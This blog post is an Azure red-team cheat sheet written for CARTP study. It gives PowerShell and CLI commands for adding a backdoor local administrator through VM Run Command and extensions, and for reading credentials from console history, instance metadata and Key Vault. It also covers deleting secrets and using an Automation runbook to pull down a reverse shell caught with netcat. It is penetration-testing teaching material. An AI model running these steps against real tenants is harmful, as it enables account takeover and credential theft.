[Azure] What To Do If?

"What To Do If" is a blog that will be updated continuously to contain valuable information about Azure Cloud resources exploit.

Last update: June, 29 2025

Hi there! In this blog, from its title, we will answer the question "What to do if you found resource XYZ in Azure?" It's very simple and will be updated continuously to contain the latest updates, commands, tools, and more. I used this guide to pass CARTP (Certified Azure Red Team Professional) certificate from Altered Security, so thanks to them especially Nikhil for the great content.

For example, If you have an assessment in an Azure environment and you gained access to a specific account or application-managed identity, what's the first step you will take? what are you gonna do if you find yourself having a specific role assignment to a virtual machine or key vault? Exactly that's what we gonna discuss here, so let's get started...

All the following steps we will follow are circular, not sequential, which means if you logged in and followed the 2 steps then you found leaked credentials and logged in again with the new user, you may need to follow the same steps from the beginning again depends on the resources you have.

Content

Used Tools
Azure AD user account & Managed Identity.
Virtual Machine & Extensions
KeyVaults
Storage Blob & Storage Accounts
Automation Account
SQL Server

Used Tools

The most used tool we will depend on is Az Powershell, but we will use different tools for specific tasks, and we will add them here to collect them in one section

Az Powershell

Install-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force

Az CLi

Download and install it from here

Azure AD user account & Managed Identity

This is your first step in any assessment to have an account or managed identity with specific roles because Azure pentest is unlike any normal website pentest, it seems like configuration review more than doing red team on on-prem environments. So, once you get an account, please do the following steps to know your roles and the resources you have access to.

Login using Az Powershell $passwd = ConvertTo-SecureString "pass@1234" -AsPlainText -Force;$creds = New-Object System.Management.Automation.PSCredential ("test@aykalam.onmicrosoft.com", $passwd);Connect-AzAccount -Credential $creds
Or you can use Az CLI to login via the browser az login

First Checks

Here we're doing quick checks to know the resources, role assignment, owned objects and more.

Check the Get-AzResource` to know the resources you have access to.
Check the Get-AzRoleAssignment to know the roles you have in a specific resource
Check the owned objects by the user using the Az Module az ad signed-in-user list-owned-objects
Check if we have Storage accounts / Blob using MicroBrust Scripts
Try to login to the Azure portal and check the Deployment history
Try to login to the Azure portal and if you have a Dynamic Group try to invite other users.
If you aren't able to login to the Azure portal due to access policy, check the following solutions:
+ Try to login using the Az CLI, Az PowerShell, or AzureAD tools.
+ Try to change the user-agent in the browser to any other device "Maybe allowed access only for specific devices".

Virtual Machine & Extensions

Check the VM network profile and IP

Run Get-AzResource
Run Get-AzRoleAssignment because you have to gain read access at least for the VM and the network profile
Check the roles you have in this VM from the above API call to get the permissions
Get the network profile name Get-AzVM -Name VMName -ResourceGroupName RGName | select -ExpandProperty NetworkProfile
Get the interface name Get-AzNetworkInterface -Name InterfaceName
Get the public IP Get-AzPublicIpAddress -Name IPAddressName

If you have a Command Executer role.

Run directly ready scripts to add a user

Invoke-AzVMRunCommand -VMName VMName -ResourceGroupName RGName -CommandId 'RunPowerShellScript' -ScriptPath 'C:\path\to\your\script' -Verbose

# content of the script file
$passwd = ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force
New-LocalUser -Name username -Password $passwd 
Add-LocalGroupMember -Group Administrators -Member username

Connect using the created account

$password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('username', $Password)
$sess = New-PSSession -ComputerName 10.20.30.40 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess

# After connecting, get the hostname and username of the machine
hostname
Get-LocalUser

# Incase you found a credentials, you can use the following command to authenticate
$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('emailuser@ayhags.onmicrosoft.com', $password)
Connect-AzAccount -Credential $creds

Extract credentials from console history (after gaining a shell)

cat C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Check if there's any User Data stored in the machine (after gaining a shell)

$userData = Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text"
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))

Try the PowerShell transcripts (after gaining a shell)

cat C:\Transcripts\<id>\PowerShell_transcript.DESKTOP- M7C1AFM.6sZJrDuN.<id>.txt

Dealing with Extensions if you have read or write permission

# Check if the extensions are installed
Get-AzVMExtension -ResourceGroupName "RGName" -VMName "VMName"

# We will be unable to create new extension but can modify the "commandToExecute" to add your own local user
Set-AzVMExtension -ResourceGroupName "RGName" -ExtensionName "ExecCmd" -VMName "VMName" -Location "Location" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users <your-username> <password> /add /Y; net localgroup administrators <your-username> /add"}'

If you found yourself in the AzureAD Connect machine with On-Prem, try to reset the Sync_ account

# Check if you are in the AzureAD connect machine, the used module will be installed by default for any connect machine
Get-ADSyncConnector

KeyVault

At first, we will check if we have access to key vaults or not, and if we have, then we will try to get its secret and read it as plain text. It's very simple.

# list the key vaults we have access to 
Get-AzKeyVault 
Vault Name: ResearchKeyVault

# Dump the secret name from a specific vault
Get-AzKeyVaultSecret -VaultName ResearchKeyVault
Name: researchkeyvault

# Read the secret 
Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name researchkeyvault –AsPlainText
username: accountName@ayhags.onmicrosoft.com ; password:adfa@asdfa$#*!@#

# list all keyvaults 
az keyvault list --query "[].{Name:name, Location:location, URI:properties.vaultUri}" -o table

# show access policy 
az keyvault show --name MYNAME --query properties.accessPolicies

# list key, secrets and ceritificates 
az keyvault secret list --vault-name MYNAME -o table
az keyvault key list --vault-name MYNAME -o table
az keyvault certificate list --vault-name MYNAME -o table 

# create and read secrets 
az keyvault secret set --vault-name MYNAME --name "TestSecret" --value "Test123"
az keyvault secret show --vault-name MYNAME --name "TestSecret"

# if success, try to delete it or delete any other secret 
az keyvault secret delete --vault-name MYNAME --name "TestSecret"
az keyvault secret list-deleted --vault-name MYNAME
az keyvault secret recover --vault-name MYNAME --name "TestSecret"

# check soft delete and purge protections 
az keyvault show --name MYNAME --query "properties.enableSoftDelete"
az keyvault show --name MYNAME --query "properties.enablePurgeProtection"

Storage Blob / Accounts

Enumerate the storage blob using MicroBrust

. C:\AzAD\Tools\MicroBurst\Misc\Invoke-EnumerateAzureBlobs.ps1
Invoke-EnumerateAzureBlobs -Base <tenantName>

If you found a container, try to access it using the <Name> </Name> tag parameter after the URL endpoint.

Check Containers

If you find your user has access to the storage account. Check if there is a container that the user has access to

PS C:\AzAD\Tools> Get-AzResource
Name: RName
ResourceGroupName: RGName
ResourceType: Microsoft.Storage/storageAccounts

PS C:\AzAD\Tools> Get-AzStorageContainer -Context (New-AzStorageContext -StorageAccountName <SAName>)
# After that if you foudn a container, login using the account you have to the Storage Explorer via the Subscription tab

If you found SAS URL or Account creds have access to Storage Blob, Open the Storage Explorer application and authenticate using the SAS URL or the Account

Check the Storage Accounts using AZ CLI

# this command will check the public access and HTTPS allowance. 
# will check the network rules in use. 
# will check the encryption and authentication configuration.
az storage account show --name MYNAME -o json | jq '{
  allowBlobPublicAccess,
  enableHttpsTrafficOnly,
  networkRuleSet: {
    defaultAction: .networkRuleSet.defaultAction,
    ipRules: .networkRuleSet.ipRules,
    virtualNetworkRules: .networkRuleSet.virtualNetworkRules
  },
  kind,
  encryption: {
    keySource: .encryption.keySource,
    blobEnabled: .encryption.services.blob.enabled
  },
  accessTier,
  allowSharedKeyAccess,
  azureFilesIdentityBasedAuthentication: .azureFilesIdentityBasedAuthentication
}'

Automation Account

Check your permissions over the automation account

Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<RGName>/providers/Microsoft.Automation/automationAccounts/HybridAutomation

Check if the hybrid worker is in use in the automation account

PS C:\AzAD\Tools> Get-AzAutomationHybridWorkerGroup -AutomationAccountName -ResourceGroupName
ResourceGroupName : AyKalam AutomationAccountName : HybridAutomation Name : Workergroup1
RunbookWorker : {} GroupType : User

Gain reverse shell access

Import PowerShell runbook file to download a reverse shell from your host machine and run it on the hybrid worker.

# Import the runbook file 
# filename.ps1 is any powershell reverse shell command. 
Import-AzAutomationRunbook -Name <RBName> -Path C:\Tools\filename.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Type PowerShell -Force -Verbose

# publish the runbook 
Publish-AzAutomationRunbook -RunbookName <RBName> -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Verbose

# run your netcat listner
nc.exe -lvp 4444

# Start the runbook 
Start-AzAutomationRunbook -RunbookName <RBName> -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Verbose

SQL Server

az sql server show --name <server-name> --resource-group <rg-name>
# this script will look for 
# publicNetworkAccess (should be Disabled in secure configs)
# minimalTlsVersion (should be 1.2 or higher)
# aadAdmin (Azure AD integration status)

To be continued...

Thanks for reading <3 Stay in touch

LinkedIn | GitHub

Previous[Azure] Real Example to know different types of app concepts in Azure

Last updated 5 months ago